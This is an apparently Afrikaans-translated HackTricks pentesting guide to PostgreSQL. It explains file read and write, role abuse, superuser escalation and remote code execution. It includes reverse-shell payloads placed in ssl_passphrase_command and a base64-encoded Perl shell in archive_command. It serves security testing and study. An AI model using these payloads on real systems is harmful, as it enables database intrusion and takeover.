5432,5433 - Pentesting Postgresql
Last updated
Last updated
Gebruik Trickest om maklik werkvloei te bou en te automate wat aangedryf word deur die wêreld se mees gevorderde gemeenskapstools. Kry Toegang Vandag:
PostgreSQL word beskryf as 'n objek-relationele databasisstelsel wat oopbron is. Hierdie stelsel gebruik nie net die SQL-taal nie, maar verbeter dit ook met bykomende kenmerke. Sy vermoëns stel dit in staat om 'n wye verskeidenheid datatipes en operasies te hanteer, wat dit 'n veelsydige keuse vir ontwikkelaars en organisasies maak.
Standaard poort: 5432, en as hierdie poort reeds in gebruik is, blyk dit dat postgresql die volgende poort (waarskynlik 5433) wat nie in gebruik is, sal gebruik.
As jy \list
uitvoer en 'n databasis genaamd rdsadmin
vind, weet jy jy is binne 'n AWS postgresql-databasis.
Vir meer inligting oor hoe om 'n PostgreSQL-databasis te misbruik kyk:
Volgens hierdie navorsing, wanneer 'n verbindingspoging misluk, gooi dblink
'n sqlclient_unable_to_establish_sqlconnection
uitsondering wat 'n verduideliking van die fout insluit. Voorbeelde van hierdie besonderhede is hieronder gelys.
Gasheer is af
DETAIL: kon nie met die bediener verbind nie: Geen roete na gasheer. Is die bediener aan die gang op gasheer "1.2.3.4" en aanvaar TCP/IP verbindings op poort 5678?
Poort is gesluit
Poort is oop
of
Poort is oop of gefilterde
In PL/pgSQL-funksies is dit tans nie moontlik om uitsondering besonderhede te verkry nie. As jy egter direkte toegang tot die PostgreSQL-bediener het, kan jy die nodige inligting verkry. As dit nie moontlik is om gebruikersname en wagwoorde uit die stelseltabelle te onttrek nie, kan jy oorweeg om die woordlys-aanvalmetode te gebruik wat in die vorige afdeling bespreek is, aangesien dit moontlik positiewe resultate kan lewer.
As jy 'n lid van pg_execute_server_program
is, kan jy programme uitvoer
As jy 'n lid van pg_read_server_files
is, kan jy lêers lees
As jy 'n lid van pg_write_server_files
is, kan jy lêers skryf
Let daarop dat in Postgres 'n gebruiker, 'n groep en 'n rol die selfde is. Dit hang net af van hoe jy dit gebruik en of jy dit toelaat om aan te meld.
Van hierdie commit kan lede van die gedefinieerde DEFAULT_ROLE_READ_SERVER_FILES
groep (genoem pg_read_server_files
) en super gebruikers die COPY
metode op enige pad gebruik (kyk na convert_and_check_filename
in genfile.c
):
Onthou dat as jy nie 'n super gebruiker is nie, maar die CREATEROLE toestemmings het, kan jy jouself 'n lid van daardie groep maak:
Daar is ander postgres funksies wat gebruik kan word om lêer te lees of 'n gids te lys. Slegs supergebruikers en gebruikers met eksplisiete toestemmings kan dit gebruik:
U kan meer funksies vind in https://www.postgresql.org/docs/current/functions-admin.html
Slegs super gebruikers en lede van pg_write_server_files
kan kopie gebruik om lêers te skryf.
Onthou dat as jy nie 'n super gebruiker is nie, maar die CREATEROLE
regte het, kan jy jouself 'n lid van daardie groep maak:
Onthou dat COPY nie nuwe reël karakters kan hanteer nie, daarom, selfs al gebruik jy 'n base64 payload, moet jy 'n een-liner stuur.
'n Baie belangrike beperking van hierdie tegniek is dat copy
nie gebruik kan word om binêre lêers te skryf nie, aangesien dit sommige binêre waardes verander.
Daar is egter ander tegnieke om groot binêre lêers op te laai:
Bug bounty wenk: meld aan by Intigriti, 'n premium bug bounty platform geskep deur hackers, vir hackers! Sluit by ons aan by https://go.intigriti.com/hacktricks vandag, en begin verdien belonings tot $100,000!
As jy die nodige toestemmings het om PostgreSQL bediener lêers te lees en te skryf, kan jy enige tabel op die bediener opdateer deur die geassosieerde lêer node te oorskryf in die PostgreSQL data gids. Meer oor hierdie tegniek hier.
Vereiste stappe:
Verkry die PostgreSQL data gids
Nota: As jy nie die huidige data gids pad uit instellings kan verkry nie, kan jy die hoof PostgreSQL weergawe deur die SELECT version()
navraag opvra en probeer om die pad te brute-force. Algemene data gids paden op Unix installasies van PostgreSQL is /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. 'n Algemene kluster naam is main
. 2. Verkry 'n relatiewe pad na die filenode, geassosieer met die teiken tabel
Hierdie navraag moet iets soos base/3/1337
teruggee. Die volle pad op skyf sal wees $DATA_DIRECTORY/base/3/1337
, d.w.s. /var/lib/postgresql/13/main/base/3/1337
. 3. Laai die filenode af deur die lo_*
funksies
Kry die datatype, geassosieer met die teiken tabel
Gebruik die PostgreSQL Filenode Editor om die filenode te redigeer; stel alle rol*
booleaanse vlae op 1 vir volle toestemmings.
(Opsioneel) Maak die in-geheue tabel kas skoon deur 'n duur SQL navraag te loop
Jy behoort nou opdatering tabelwaardes in die PostgreSQL te sien.
Jy kan ook 'n superadmin word deur die pg_authid
tabel te redigeer. Sien die volgende afdeling.
Sedert weergawe 9.3, kan slegs super gebruikers en lede van die groep pg_execute_server_program
copy gebruik vir RCE (voorbeeld met eksfiltrasie:
Voorbeeld om uit te voer:
Onthou dat as jy nie 'n super gebruiker is nie, maar die CREATEROLE
toestemmings het, kan jy jouself 'n lid van daardie groep maak:
Of gebruik die multi/postgres/postgres_copy_from_program_cmd_exec
module van metasploit.
Meer inligting oor hierdie kwesbaarheid hier. Terwyl dit as CVE-2019-9193 gerapporteer is, het Postges verklaar dat dit 'n kenmerk is en nie reggestel sal word nie.
Sodra jy geleer het uit die vorige pos hoe om binêre lêers op te laai, kan jy probeer om RCE te verkry deur 'n postgresql-uitbreiding op te laai en dit te laai.
Die volgende RCE vektore is veral nuttig in beperkte SQLi kontekste, aangesien alle stappe deur geneste SELECT verklarings uitgevoer kan word
Die konfigurasie lêer van PostgreSQL is skryfbaar deur die postgres gebruiker, wat die een is wat die databasis bestuur, so as superuser, kan jy lêers in die lêerstelsel skryf, en daarom kan jy hierdie lêer oorskryf.
Meer inligting oor hierdie tegniek hier.
Die konfigurasie lêer het 'n paar interessante eienskappe wat tot RCE kan lei:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Pad na die private sleutel van die databasis
ssl_passphrase_command = ''
As die private lêer deur 'n wagwoord beskerm word (geënkripteer) sal postgresql die opdrag wat in hierdie eienskap aangedui word uitvoer.
ssl_passphrase_command_supports_reload = off
As hierdie eienskap aan is, sal die opdrag wat uitgevoer word as die sleutel deur 'n wagwoord beskerm word uitgevoer word wanneer pg_reload_conf()
uitgevoer word.
Dan sal 'n aanvaller moet:
Dump die private sleutel van die bediener
Enkripteer die afgelaaide private sleutel:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Oorskryf
Dump die huidige postgresql konfigurasie
Oorskryf die konfigurasie met die genoemde eienskappe konfigurasie:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Voer pg_reload_conf()
uit
Terwyl ek dit getoets het, het ek opgemerk dat dit slegs sal werk as die private sleutel lêer die regte 640 het, dit is besit deur root en deur die groep ssl-cert of postgres (sodat die postgres gebruiker dit kan lees), en is geplaas in /var/lib/postgresql/12/main.
Meer inligting oor hierdie konfig en oor WAL hier.
Nog 'n eienskap in die konfigurasie lêer wat uitgebuit kan word, is archive_command
.
Vir dit om te werk, moet die archive_mode
instelling 'on'
of 'always'
wees. As dit waar is, kan ons die opdrag in archive_command
oorskryf en dit dwing om uit te voer via die WAL (write-ahead logging) operasies.
Die algemene stappe is:
Kontroleer of archive mode geaktiveer is: SELECT current_setting('archive_mode')
Oorskryf archive_command
met die payload. Byvoorbeeld, 'n omgekeerde skulp: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Herlaai die konfigurasie: SELECT pg_reload_conf()
Dwing die WAL operasie om te loop, wat die archive opdrag sal aanroep: SELECT pg_switch_wal()
of SELECT pg_switch_xlog()
vir sommige Postgres weergawes
Meer inligting oor hierdie tegniek hier.
Hierdie aanvalsvector maak gebruik van die volgende konfigurasie veranderlikes:
session_preload_libraries
-- biblioteke wat deur die PostgreSQL bediener by die kliëntverbinding gelaai sal word.
dynamic_library_path
-- lys van gidse waar die PostgreSQL bediener sal soek na die biblioteke.
Ons kan die dynamic_library_path
waarde stel na 'n gids, skryfbaar deur die postgres
gebruiker wat die databasis bestuur, byvoorbeeld, /tmp/
gids, en 'n kwaadwillige .so
objek daar op te laai. Volgende, sal ons die PostgreSQL bediener dwing om ons nuut opgelaaide biblioteek te laai deur dit in die session_preload_libraries
veranderlike in te sluit.
Die aanval stappe is:
Laai die oorspronklike postgresql.conf
af
Sluit die /tmp/
gids in die dynamic_library_path
waarde in, byvoorbeeld dynamic_library_path = '/tmp:$libdir'
Sluit die kwaadwillige biblioteeknaam in die session_preload_libraries
waarde in, byvoorbeeld session_preload_libraries = 'payload.so'
Kontroleer die groot PostgreSQL weergawe via die SELECT version()
navraag
Compile die kwaadwillige biblioteekkode met die korrekte PostgreSQL ontwikkelingspakket Voorbeeldkode:
Die kode compile:
Laai die kwaadwillige postgresql.conf
, geskep in stappe 2-3, op en oorskryf die oorspronklike een
Laai die payload.so
van stap 5 na die /tmp
gids
Herlaai die bediener konfigurasie deur die bediener te herbegin of die SELECT pg_reload_conf()
navraag aan te roep
By die volgende DB verbinding, sal jy die omgekeerde skulp verbinding ontvang.
Volgens die dokumentasie: Rolles wat CREATEROLE
regte het, kan lidmaatskap in enige rol wat nie 'n superuser is, toeken of intrek.
So, as jy CREATEROLE
toestemming het, kan jy jouself toegang gee tot ander rolle (wat nie superuser is nie) wat jou die opsie kan gee om lêers te lees en te skryf en opdragte uit te voer:
Gebruikers met hierdie rol kan ook verander die wagwoorde van ander nie-supergebruikers:
Dit is redelik algemeen om te vind dat lokale gebruikers in PostgreSQL kan aanmeld sonder om enige wagwoord te verskaf. Daarom, sodra jy toestemming om kode uit te voer versamel het, kan jy hierdie toestemming misbruik om jou SUPERUSER
rol te verleen:
Dit is gewoonlik moontlik as gevolg van die volgende lyne in die pg_hba.conf
lêer:
In hierdie skrywe word verduidelik hoe dit moontlik was om privesc in Postgres GCP te misbruik deur die ALTER TABLE voorreg wat aan die gebruiker toegeken is.
Wanneer jy probeer om 'n ander gebruiker die eienaar van 'n tabel te maak, behoort jy 'n fout te ontvang wat dit voorkom, maar blykbaar het GCP daardie opsie aan die nie-superuser postgres gebruiker in GCP gegee:
Deur hierdie idee te kombineer met die feit dat wanneer die INSERT/UPDATE/ANALYZE op 'n tabel met 'n indeksfunksie uitgevoer word, die funksie as deel van die opdrag met die tabel eienaar se regte opgeroep word. Dit is moontlik om 'n indeks met 'n funksie te skep en eienaarregte aan 'n super gebruiker oor daardie tabel te gee, en dan ANALYZE oor die tabel met die kwaadwillige funksie uit te voer wat in staat sal wees om opdragte uit te voer omdat dit die voorregte van die eienaar gebruik.
Begin deur 'n nuwe tabel te skep.
Voeg 'n paar irrelevante inhoud in die tabel in om data vir die indeksfunksie te verskaf.
Ontwikkel 'n kwaadwillige indeksfunksie wat 'n kode-uitvoeringspayload bevat, wat ongeoorloofde opdragte toelaat om uitgevoer te word.
ALTER die tabel se eienaar na "cloudsqladmin," wat GCP se superuser rol is wat eksklusief deur Cloud SQL gebruik word om die databasis te bestuur en te onderhou.
Voer 'n ANALYZE-operasie op die tabel uit. Hierdie aksie dwing die PostgreSQL-enjin om na die gebruikerskonteks van die tabel se eienaar, "cloudsqladmin," oor te skakel. Gevolglik word die kwaadwillige indeksfunksie met die regte van "cloudsqladmin" aangeroep, wat die uitvoering van die voorheen ongeoorloofde shell-opdrag moontlik maak.
In PostgreSQL lyk hierdie vloei iets soos hierdie:
Dan sal die shell_commands_results
tabel die uitvoer van die uitgevoerde kode bevat:
Sommige verkeerd geconfigureerde postgresql instansies mag die aanmelding van enige plaaslike gebruiker toelaat, dit is moontlik om plaaslik vanaf 127.0.0.1 te teken met die dblink
funksie:
Let daarop dat vir die vorige navraag om te werk die funksie dblink
moet bestaan. As dit nie bestaan nie, kan jy probeer om dit te skep met
As jy die wagwoord van 'n gebruiker met meer voorregte het, maar die gebruiker mag nie vanaf 'n eksterne IP aanmeld nie, kan jy die volgende funksie gebruik om navrae as daardie gebruiker uit te voer:
Dit is moontlik om te kontroleer of hierdie funksie bestaan met:
In hierdie skrywe, kon pentesters privesc binne 'n postgres-instantie wat deur IBM verskaf is, omdat hulle hierdie funksie met die SECURITY DEFINER-vlag gevind het:
Soos in die dokumentasie verduidelik word 'n funksie met SECURITY DEFINER uitgevoer met die voorregte van die gebruiker wat dit besit. Daarom, as die funksie kwulnerabel is vir SQL Injection of sekere voorregte aksies uitvoer met parameters wat deur die aanvaller beheer word, kan dit misbruik word om voorregte binne postgres te eskaleer.
In lyn 4 van die vorige kode kan jy sien dat die funksie die SECURITY DEFINER vlag het.
And then voer opdragte uit:
PL/pgSQL is 'n volledig funksionele programmeertaal wat groter prosedurele beheer bied in vergelyking met SQL. Dit stel die gebruik van lusse en ander beheersstrukture in staat om programlogika te verbeter. Daarbenewens het SQL-verklarings en triggers die vermoë om funksies aan te roep wat geskep is met die PL/pgSQL-taal. Hierdie integrasie stel 'n meer omvattende en veelsydige benadering tot databasisprogrammering en outomatisering in staat. Jy kan hierdie taal misbruik om PostgreSQL te vra om die gebruikers se akrediteer te brute-force.
Die volgende privesc-vektor is veral nuttig in beperkte SQLi-kontekste, aangesien alle stappe deur geneste SELECT-verklarings uitgevoer kan word
As jy PostgreSQL-bediener lêers kan lees en skryf, kan jy 'n superuser word deur die PostgreSQL op-disk filenode, geassosieer met die interne pg_authid
tabel, oor te skryf.
Lees meer oor hierdie tegniek hier.
Die aanvalstappe is:
Verkry die PostgreSQL datadirektories
Verkry 'n relatiewe pad na die filenode, geassosieer met die pg_authid
tabel
Laai die filenode af deur die lo_*
funksies
Kry die datatype, geassosieer met die pg_authid
tabel
Gebruik die PostgreSQL Filenode Editor om die filenode te redigeer; stel alle rol*
boolean-vlaggies op 1 vir volle regte.
Herlaai die gewysigde filenode via die lo_*
funksies, en oorwrite die oorspronklike lêer op die skyf
(Opsioneel) Maak die in-geheue tabelkas skoon deur 'n duur SQL-navraag te loop
Jy behoort nou die voorregte van 'n volle superadmin te hê.
Binne die postgresql.conf lêer kan jy postgresql logs aktiveer deur te verander:
Then, herstart die diens.
pgadmin is 'n administrasie- en ontwikkelingsplatform vir PostgreSQL. Jy kan wagwoorde binne die pgadmin4.db lêer vind. Jy kan dit ontsleutel met die decrypt funksie binne die skrif: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
Kliëntverifikasie in PostgreSQL word bestuur deur 'n konfigurasie-lêer genaamd pg_hba.conf. Hierdie lêer bevat 'n reeks rekords, elk wat 'n verbindingstipe, kliënt IP-adresreeks (indien van toepassing), databasisnaam, gebruikersnaam en die verifikasiemetode spesifiseer wat gebruik moet word om ooreenstemmende verbindings te vind. Die eerste rekord wat ooreenstem met die verbindingstipe, kliëntadres, aangevraagde databasis en gebruikersnaam, word vir verifikasie gebruik. Daar is geen terugval of rugsteun as verifikasie misluk nie. As geen rekord ooreenstem nie, word toegang geweier.
Die beskikbare wagwoord-gebaseerde verifikasiemetodes in pg_hba.conf is md5, crypt, en password. Hierdie metodes verskil in hoe die wagwoord oorgedra word: MD5-gehasht, crypt-geënkripteer, of duidelike teks. Dit is belangrik om te noem dat die crypt-metode nie gebruik kan word met wagwoorde wat in pg_authid geënkripteer is nie.
Gebruik Trickest om maklik te bou en werkvloei te automate wat deur die wêreld se mees gevorderde gemeenskapstools aangedryf word. Kry Toegang Vandag:
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Rol tipe | |
---|---|
6. Herlaai die geredigeerde filenode via die lo_*
funksies, en oorskryf die oorspronklike lêer op die skyf
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
rolsuper
Rol het superuser privileges
rolinherit
Rol erf outomaties die privileges van rolle waarvan dit 'n lid is
rolcreaterole
Rol kan meer rolle skep
rolcreatedb
Rol kan databasisse skep
rolcanlogin
Rol kan aanmeld. Dit wil sê, hierdie rol kan as die aanvanklike sessie-outeididentifiseerder gegee word
rolreplication
Rol is 'n replikasie rol. 'n Replikasie rol kan replikasieverbindinge inisieer en replikasieslotte skep en verwyder.
rolconnlimit
Vir rolle wat kan aanmeld, stel dit die maksimum aantal gelyktydige verbindings wat hierdie rol kan maak. -1 beteken geen limiet.
rolpassword
Nie die wagwoord nie (lees altyd as ********
)
rolvaliduntil
Wagwoord vervaldatum (slegs gebruik vir wagwoordverifikasie); null as daar geen vervaldatum is
rolbypassrls
Rol omseil elke ry-vlak sekuriteitsbeleid, sien Afdeling 5.8 vir meer inligting.
rolconfig
Rol-spesifieke standaardinstellings vir tydens uitvoering konfigurasie veranderlikes
oid
ID van rol